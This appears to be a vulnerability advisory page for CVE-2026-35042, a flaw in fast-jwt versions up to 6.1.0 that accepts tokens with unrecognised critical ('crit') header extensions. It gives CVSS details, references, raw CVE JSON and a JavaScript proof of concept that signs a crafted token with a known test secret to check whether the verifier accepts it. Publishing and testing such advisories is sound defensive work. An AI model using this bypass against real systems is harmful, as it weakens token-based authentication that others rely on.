Security Vulnerability Report
CVE-2026-35042 CVSS 7.5 HIGH

CVE-2026-35042

Published: 2026-04-06 17:17:13
Last Modified: 2026-04-10 18:35:35

Description

fast-jwt provides fast JSON Web Token (JWT) implementation. In 6.1.0 and earlier, fast-jwt does not validate the crit (Critical) Header Parameter defined in RFC 7515 §4.1.11. When a JWS token contains a crit array listing extensions that fast-jwt does not understand, the library accepts the token instead of rejecting it. This violates the MUST requirement in the RFC.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:nearform:fast-jwt:*:*:*:*:*:node.js:*:* - VULNERABLE
fast-jwt <= 6.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// PoC for CVE-2026-35042: fast-jwt 'crit' header validation bypass
// This script demonstrates that a token with an unknown critical extension is accepted.
const crypto = require('crypto');
const fastjwt = require('fast-jwt');

const secret = 'secret-key';

// 1. Create a verifier instance (vulnerable version <= 6.1.0)
const verifier = fastjwt.createVerifier({ key: secret });

// 2. Construct a token header with 'crit' pointing to an unknown parameter
// Header: { "alg": "HS256", "crit": ["http://example.com/unknown_extension"] }
// Note: In a real attack, the attacker must sign this header with a valid key known to the server.
// This PoC assumes the attacker can generate a valid signature for the crafted header.
// Crafted token structure (Base64URL encoded):
// Header part: eyJhbGciOiJIUzI1NiIsImNyaXQiOlsiaHR0cDovL2V4YW1wbGUuY29tL3Vua25vd25fZXh0ZW5zaW9uIl19
// Payload part: eyJ1c2VyIjoiYWRtaW4ifQ
// Signature: HMAC-SHA256 of header.payload under the server's key
const signingInput = 'eyJhbGciOiJIUzI1NiIsImNyaXQiOlsiaHR0cDovL2V4YW1wbGUuY29tL3Vua25vd25fZXh0ZW5zaW9uIl19.eyJ1c2VyIjoiYWRtaW4ifQ';
// The original placeholder signature string could never verify, so the script would always
// report "Secure". Here the signature is computed with the known test secret so that the
// 'crit' handling is actually exercised. Requires Node >= 15.7 for the 'base64url' encoding.
const signature = crypto.createHmac('sha256', secret).update(signingInput).digest('base64url');
const maliciousToken = `${signingInput}.${signature}`;

try {
  // In a vulnerable environment, since the signature is valid, this passes.
  // It SHOULD throw an error because the 'crit' parameter is unknown.
  const decoded = verifier(maliciousToken);
  console.log("[!] Vulnerability Detected: Token accepted despite unknown crit header.", decoded);
} catch (error) {
  console.log("[+] Secure: Token rejected as expected.");
}

References

https://github.com/nearform/fast-jwt/security/advisories/GHSA-hm7r-c7qw-ghp6 (Exploit, Mitigation, Vendor Advisory)
https://www.rfc-editor.org/rfc/rfc7515.html#section-4.1.11 (Technical Description)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-35042",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-06T17:17:13.410",
    "lastModified": "2026-04-10T18:35:35.117",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "fast-jwt provides fast JSON Web Token (JWT) implementation. In 6.1.0 and earlier, fast-jwt does not validate the crit (Critical) Header Parameter defined in RFC 7515 §4.1.11. When a JWS token contains a crit array listing extensions that fast-jwt does not understand, the library accepts the token instead of rejecting it. This violates the MUST requirement in the RFC."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-345"},
          {"lang": "en", "value": "CWE-636"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:nearform:fast-jwt:*:*:*:*:*:node.js:*:*",
                "versionEndExcluding": "6.2.0",
                "matchCriteriaId": "FD2BA255-333A-4CF2-9B8E-C685DF7A11A9"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/nearform/fast-jwt/security/advisories/GHSA-hm7r-c7qw-ghp6",
        "source": "[email protected]",
        "tags": ["Exploit", "Mitigation", "Vendor Advisory"]
      },
      {
        "url": "https://www.rfc-editor.org/rfc/rfc7515.html#section-4.1.11",
        "source": "[email protected]",
        "tags": ["Technical Description"]
      },
      {
        "url": "https://github.com/nearform/fast-jwt/security/advisories/GHSA-hm7r-c7qw-ghp6",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Exploit", "Mitigation", "Vendor Advisory"]
      }
    ]
  }
}